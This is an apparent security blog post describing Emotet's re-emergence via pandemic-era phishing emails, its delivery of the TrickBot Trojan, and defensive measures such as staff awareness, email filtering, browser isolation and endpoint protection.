Spam e-mails and social engineered attacks have been pouring in during this pandemic. As most of us are working from home, the chances of exposing ourselves and our organizations to these malicious actors have increased exponentially. During March and April, the internet saw massive COVID-19-themed phishing campaigns, and now, the infamous Emotet is back again to haunt enterprise networks.
After almost five months of inactivity, Emotet malware was rediscovered on the internet by James Quinn, a binary defense researcher. It is being distributed through phishing e-mails that are disguised as payment reports, employment opportunities, receipts, and invoices.
Before we discuss how to defend against this malware instance, we first need to understand its characteristics.
Emotet is a Trojan that is distributed via phishing e-mails that typically leverage demanding subject lines mentioning time sensitive subjects like deliveries, invoices, and payment details to tempt recipients into opening them. Emails are well crafted to impersonate legitimate entities while the attached documents come with malicious scripts and macro-enabled files.
Once downloaded, these files start establishing control on the vicitm's device. Emotet uses the command and control (C&C) server to retrieve the payload and attach itself to the target.
Unlike other malware, Emotet has detection evasion properties to keep itself dormant inside a virtual machine (VM) and avoid being detected through the sandbox ecosystem that security professionals use to identify threats. On top of this, Emotet receives version updates to develop its resistance to detection; deploy other malware instances like banking Trojans and ransomware; and steal device data like credentials, financial details, usernames, and more.
Once Emotet attaches itself to a system, it will begin pulling payloads from the C&C server. In the version currently circulating, Emotet downloads the TrickBot Trojan, which infects Windows machines.
TrickBot is capable of performing multiple malicious activities within the infected devices by stealing the Active Directory services database; open SSH keys; VNC, RDP, and Putty credentials; and banking credentials. After that, it spreads through the network laterally to infect other devices.
In some cases, TrickBot is also used to deploy ransomware through the reverse shell, which would then allow ransomware operators to deploy their malicious programs into devices on the same network.
Educate your security professionals about the Emotet attack workflow, and ensure they're aware of TrickBot and its capabilities. Advise employees not to open anonymous emails or attachments without confirmation from the sender. Furthermore, block emails from blacklisted domains to reduce the probability of encountering malware.
Employing a proper browser security procedure like updating plugins and extensions, browser isolation, restricting file downloads from unauthorized websites, and enforcing kiosk mode to ensure employees access only IT-approved websites and business web applications can give security professionals an upper hand over these phishing emails.
However, if malware is already inside the network and has infected your devices, then it's time to be reactive. To detect and neutralize threats as soon as possible, employ an endpoint protection solution that can detect these threats and remove them. Also, it's important to ensure your antivirus is up to date with the latest malware definitions so it can effectively detect and remove known threats like these.
